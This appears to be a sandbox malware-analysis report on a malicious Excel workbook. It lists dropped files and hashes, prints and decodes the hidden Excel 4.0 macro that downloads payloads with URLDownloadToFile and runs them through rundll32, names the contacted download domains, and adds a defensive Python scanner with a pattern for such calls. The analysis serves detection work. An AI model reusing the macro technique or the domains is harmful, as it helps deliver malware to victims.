                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\Local\Temp\TarEA42.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):152788
                                                                                    Entropy (8bit):6.309740459389463
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                    Malicious:false
                                                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 19:49:42 2021, atime=Tue May 4 19:49:42 2021, length=12288, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):867
                                                                                    Entropy (8bit):4.471543208289185
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:85Qnkyky3LgXg/XAlCPCHaXtB8XzB/ubX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85p36/XTd6jEYevDv3qKrNru/
                                                                                    MD5:78AC3EEEFBEFEE85D7E9A6A99395C64C
                                                                                    SHA1:B715602FB81AF314AB7664DC80AF4A9A164516C3
                                                                                    SHA-256:86600F0DA68F65521F9A0F9ABCAFE52549E0D1E4398C7070BDAA4745C62D4FE3
                                                                                    SHA-512:3F171459F60EA759BB7EBD13102D0E84131BE1579B254767F6DA30F5EC252AECEFB925D8098B130C4C2CDAE70F3B009C0F331DBB30832298108504364B6F842D
                                                                                    Malicious:false
                                                                                    Preview: L..................F...........7G..tW;.'A..tW;.'A...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R6...Desktop.d......QK.X.R6.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):115
                                                                                    Entropy (8bit):4.494767934221362
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:oyBVomxWdachXpSOytchXpSmxWdachXpSv:djuaUpytUpQaUpc
                                                                                    MD5:FA0A33D399C02FC598EC4632F340494F
                                                                                    SHA1:5F94ABDC6C4B12636D5C8F3BF1865694CDB06923
                                                                                    SHA-256:098801A50A26DA0D9D4F90A0C18247EB2D0DF5EB66A1BF4EAD24C913CEFCA1B3
                                                                                    SHA-512:2897EFEFE704E57E6B1FEDDE4CC19F163D41E859F800CDF1C1DFEDB0F0284CBD89B9C7CAFEC7090A578E26E0DE7E3C2FCC580ADDF0E7951779D8CE39A4E2D602
                                                                                    Malicious:false
                                                                                    Preview: Desktop.LNK=0..[misc]..statistic-2067311372.LNK=0..statistic-2067311372.LNK=0..[misc]..statistic-2067311372.LNK=0..
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2067311372.LNK
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue May 4 19:49:42 2021, atime=Tue May 4 19:49:42 2021, length=109077, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):2138
                                                                                    Entropy (8bit):4.5299242093547605
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:8s/XT0jF32Ehu4bKQh2s/XT0jF32Ehu4bKQ/:8s/XojF32d4bKQh2s/XojF32d4bKQ/
                                                                                    MD5:AB3842535F6C0CEB6514052E03213061
                                                                                    SHA1:701CA01F87C93E6AF717BD9DFE168102E4DEB327
                                                                                    SHA-256:088F0DFAE947F373119C8F4199BE99715CBB4CCD047C9942613729B6FE07EBAA
                                                                                    SHA-512:2705603F6C0AE1D4715078424869797F9B7106E41F689BF8BE03CEE0B0AD8E48A76340377FC9673DD93AB2B1F500C34B307A0E4EAF3AB2822FBF466DBC39EEB4
                                                                                    Malicious:false
                                                                                    Preview: L..................F.... ......{..tW;.'A....I.'A...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......R1. .STATIS~1.XLS..`.......Q.y.Q.y*...8.....................s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\statistic-2067311372.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041.........
                                                                                    C:\Users\user\Desktop\A0EE0000
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):109077
                                                                                    Entropy (8bit):7.916954833344646
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfZD:oeuocrZD2MopH8x+FHdoLqp6vif+zbl
                                                                                    MD5:520DFA3FCAA0EB5150D431FD0A7BD0C9
                                                                                    SHA1:D74FBF464CBA7779A4289F6E0BC4717BEE201189
                                                                                    SHA-256:7A25221090E8C732FFF6D20897E838B0F11160DD223C8B7CD8B0DBC80AD25054
                                                                                    SHA-512:A92F840135F9AA8218E502E9ED48B8A18706AF0DCCA0AA52F23DE374AC69533D4BF474F67423B9E61049420B320DCE8763AE2E5C98F8DC96D270CF6BE347724A
                                                                                    Malicious:false
                                                                                    Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\Desktop\~$statistic-2067311372.xlsm
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):330
                                                                                    Entropy (8bit):1.4377382811115937
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                    Malicious:true
                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                    C:\Users\user\jordji.nbvt11
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):494
                                                                                    Entropy (8bit):4.962239405540505
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                    MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                    SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                    SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                    SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                    Malicious:false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
Note: this file is the second download target of the macro (..\jordji.nbvt11) and is later handed to rundll32 with the DllRegisterServer export (see System Behavior), yet it is a 494-byte HTML page whose only content is an iframe to http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4, which looks like a domain-parking redirect rather than a PE module. That second rundll32 invocation therefore had no valid DLL to load; only the first download (..\jordji.nbvt1) could have delivered executable code in this run.

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:Microsoft Excel 2007+
                                                                                    Entropy (8bit):7.917049261986743
                                                                                    TrID:
                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                    File name:statistic-2067311372.xlsm
File size:109084 bytes
                                                                                    MD5:894169c41e45975fa36c36c031628f52
                                                                                    SHA1:3ad2f1b52fca973252dfba03610bf1def0c37e3c
                                                                                    SHA256:69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
                                                                                    SHA512:604e1cc0560400d17b35782c1b942332dd1c428fce24dbb5f62ab37f00594693e0ffb87b7a50749482bdba75cd0422602a3f93a8bb5e80150a3605086f34e478
                                                                                    SSDEEP:1536:iutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ikuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                                    File Content Preview:PK..........!.t...............[Content_Types].xml ...(............................................................................................................................................##...........................................................

                                                                                    File Icon

                                                                                    Icon Hash:e4e2aa8aa4bcbcac

                                                                                    Static OLE Info

                                                                                    General

                                                                                    Document Type:OpenXML
                                                                                    Number of OLE Files:1

                                                                                    OLE File "statistic-2067311372.xlsm"

                                                                                    Indicators

                                                                                    Has Summary Info:
                                                                                    Application Name:
                                                                                    Encrypted Document:
                                                                                    Contains Word Document Stream:
                                                                                    Contains Workbook/Book Stream:
                                                                                    Contains PowerPoint Document Stream:
                                                                                    Contains Visio Document Stream:
                                                                                    Contains ObjectPool Stream:
                                                                                    Flash Objects Count:
                                                                                    Contains VBA Macros:

                                                                                    Macro 4.0 Code

The sandbox dumps the hidden macro sheet as CSV. The rows before the formulas consist only of empty cells and are omitted here; inside the formulas, double quotes are CSV-escaped as "" in the raw dump and are shown unescaped below, one formula per line:

=HALT()
=4984654+9846544+468464
=CALL(Sheet2!AY107&"n",Sheet2!AY108&"A",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)
=CALL(Sheet2!AY107&"n",Sheet2!AY108&"A",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&"1",0,0)
=Sheet2!AW142()

Remaining cells of the dumped row, verbatim:

U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

How to read this: the strings the macro needs are never stored whole. Taking every third cell of the dump gives three columns: U, R, L, D, o, w, n, l, o, a, d, T, o, F, i, l, e (URLDownloadToFile; the R is run together with the path cell ..\jordji.nbvt1 in the dump), J, J, C, C, B, B (JJCCBB, the CALL data-type string conventionally used with URLDownloadToFileA) and D, l, l, R, e, g, i, s, t, e, r, S, e, r, ve, r (DllRegisterServer). With those pieces the two CALL formulas resolve to the same import: argument 1 is the module name held in Sheet2!AY107 with "n" appended (that cell is not in the dump), argument 2 is URLDownloadToFile with "A" appended to select the ANSI export, argument 3 is the JJCCBB type string, then the pCaller value (before.3.21.42.sheet!AR49), the URL (Sheet2!AT114 for the first call, AT115 for the second; neither URL is in the dump, but the DNS queries below show the two hosts contacted), the destination path before.3.21.42.sheet!AT39 (..\jordji.nbvt1, with "1" appended in the second call to give ..\jordji.nbvt11) and two zero arguments. The two destination paths are exactly the modules later passed to rundll32 with the DllRegisterServer export (see System Behavior). =Sheet2!AW142() runs the macro code that starts at that cell on the second sheet, and the arithmetic formula is padding that only yields a number.
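
The dump above is what a triage script should be able to recover from the raw .xlsm without opening it in Excel. The following is an added example, not code from the report or from Joe Sandbox: it constructs a minimal workbook archive in memory (sample data, with the CALL formula copied from the dump, invented cell addresses, and the content-type and namespace strings assumed to match what Excel writes for macrosheets) and scans it for the indicators the report's verdict rests on: a part typed as a macrosheet, a hidden or veryHidden sheet, formulas that use CALL/EXEC/REGISTER, and the one-character-per-cell scatter used to hide strings.

```python
"""Static triage of an .xlsm for Excel 4.0 (XLM) macro sheets.

Added example; not code from the sandbox report or from any tool it names.
Builds a minimal OOXML workbook in memory (constructed sample) whose veryHidden
macrosheet carries formulas from the "Macro 4.0 Code" dump, then scans it.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Content type Excel assigns to XLM macro sheet parts inside an .xlsm (assumed here).
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
# XLM functions that reach outside the workbook, plus strings seen in this sample.
SUSPICIOUS = re.compile(
    r"\b(CALL|EXEC|REGISTER|FOPEN|FWRITE|RUN)\s*\(|URLDownloadToFile|DllRegisterServer|rundll32",
    re.I,
)


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts in front of a tag."""
    return tag.rsplit("}", 1)[-1]


def scan_xlsm(data: bytes) -> dict:
    """Report macrosheet parts, hidden sheets, flagged formulas and single-char cells."""
    result = {"macrosheets": [], "hidden_sheets": [], "flagged": [], "single_char_cells": 0}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        # 1. Parts declared as macrosheets in [Content_Types].xml.
        for el in ET.fromstring(z.read("[Content_Types].xml")).iter():
            if _local(el.tag) == "Override" and el.get("ContentType") == MACROSHEET_CT:
                result["macrosheets"].append(el.get("PartName").lstrip("/"))
        # 2. Sheets marked hidden/veryHidden in workbook.xml (where XLM usually hides).
        for el in ET.fromstring(z.read("xl/workbook.xml")).iter():
            if _local(el.tag) == "sheet" and el.get("state") in ("hidden", "veryHidden"):
                result["hidden_sheets"].append((el.get("name"), el.get("state")))
        # 3. Formulas (<f>) and values (<v>) of every cell in each macrosheet.
        for part in result["macrosheets"]:
            if part not in z.namelist():
                continue
            for c in ET.fromstring(z.read(part)).iter():
                if _local(c.tag) != "c":
                    continue
                formula = next((e.text for e in c if _local(e.tag) == "f" and e.text), None)
                value = next((e.text for e in c if _local(e.tag) == "v" and e.text), None)
                if formula and SUSPICIOUS.search(formula):
                    result["flagged"].append((c.get("r"), formula))
                if value is not None and len(value) == 1:
                    # Strings scattered one character per cell, as in this sample.
                    result["single_char_cells"] += 1
    return result


def build_sample() -> bytes:
    """Constructed .xlsm-like archive: one visible sheet, one veryHidden macrosheet."""
    main = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    rel = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    xm = "http://schemas.microsoft.com/office/excel/2006/main"
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        '<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
        f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>'
        "</Types>"
    )
    workbook = (
        f'<workbook xmlns="{main}" xmlns:r="{rel}"><sheets>'
        '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="before.3.21.42.sheet" sheetId="2" state="veryHidden" r:id="rId2"/>'
        "</sheets></workbook>"
    )
    # Formulas as stored in OOXML: no leading "=", & escaped as &amp;. Cell addresses
    # are invented; the CALL text is copied from the report's dump.
    macrosheet = (
        f'<xm:macrosheet xmlns="{main}" xmlns:xm="{xm}"><sheetData>'
        '<row r="1"><c r="A1"><f>4984654+9846544+468464</f></c>'
        '<c r="B1" t="str"><v>U</v></c><c r="C1" t="str"><v>J</v></c><c r="D1" t="str"><v>D</v></c></row>'
        '<row r="2"><c r="A2"><f>CALL(Sheet2!AY107&amp;"n",Sheet2!AY108&amp;"A",Sheet2!AY118,AR49,Sheet2!AT114,AT39,0,0)</f></c>'
        '<c r="B2" t="str"><v>R</v></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row>'
        "</sheetData></xm:macrosheet>"
    )
    worksheet = f'<worksheet xmlns="{main}"><sheetData/></worksheet>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", worksheet)
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    for key, val in scan_xlsm(build_sample()).items():
        print(key, val)
```

Run against a real sample, replace build_sample() with the file's bytes; the scanner deliberately ignores the relationship files, so a document whose macrosheet is reachable only through xl/_rels is still caught by the content-type override, which Excel needs in order to load the sheet at all.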

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 13:49:38.018219948 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:38.204818010 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.204930067 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:38.218786955 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:38.403544903 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.410284996 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.410320044 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.410356045 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.410470009 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:38.464744091 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:38.655004978 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:38.655155897 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:40.320177078 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:40.545079947 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:40.875216961 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:40.875394106 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:40.876163960 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22
May 4, 2021 13:49:40.876254082 CEST | 49165 | 443 | 192.168.2.22 | 192.254.233.89
May 4, 2021 13:49:40.941540956 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.103374958 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.103563070 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.104643106 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.266127110 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.279258013 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.279293060 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.279311895 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.279443026 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.319683075 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.491117001 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.491329908 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.530486107 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.710499048 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.710581064 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.710635900 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.710685015 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.711136103 CEST | 49168 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.713047981 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.871856928 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.872030020 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:41.872551918 CEST | 443 | 49168 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:41.872657061 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.031402111 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.092343092 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.092534065 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.093055964 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.124530077 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.251837969 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.283762932 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.396389008 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.396457911 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:49:42.396579027 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.397042036 CEST | 49169 | 443 | 192.168.2.22 | 192.185.5.2
May 4, 2021 13:49:42.555675030 CEST | 443 | 49169 | 192.185.5.2 | 192.168.2.22
May 4, 2021 13:50:10.876177073 CEST | 443 | 49165 | 192.254.233.89 | 192.168.2.22

                                                                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 13:49:37.943892956 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:38.000962973 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 4, 2021 13:49:38.986424923 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:39.035417080 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
May 4, 2021 13:49:39.042653084 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:39.094059944 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
May 4, 2021 13:49:39.655258894 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:39.703845024 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
May 4, 2021 13:49:39.713066101 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:39.772975922 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
May 4, 2021 13:49:40.890054941 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 13:49:40.939656973 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22

                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 13:49:37.943892956 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | industrialarttextile.com | A (IP address) | IN (0x0001)
May 4, 2021 13:49:40.890054941 CEST | 192.168.2.22 | 8.8.8.8 | 0xd5c0 | Standard query (0) | anaheimdermatologists.com | A (IP address) | IN (0x0001)

                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
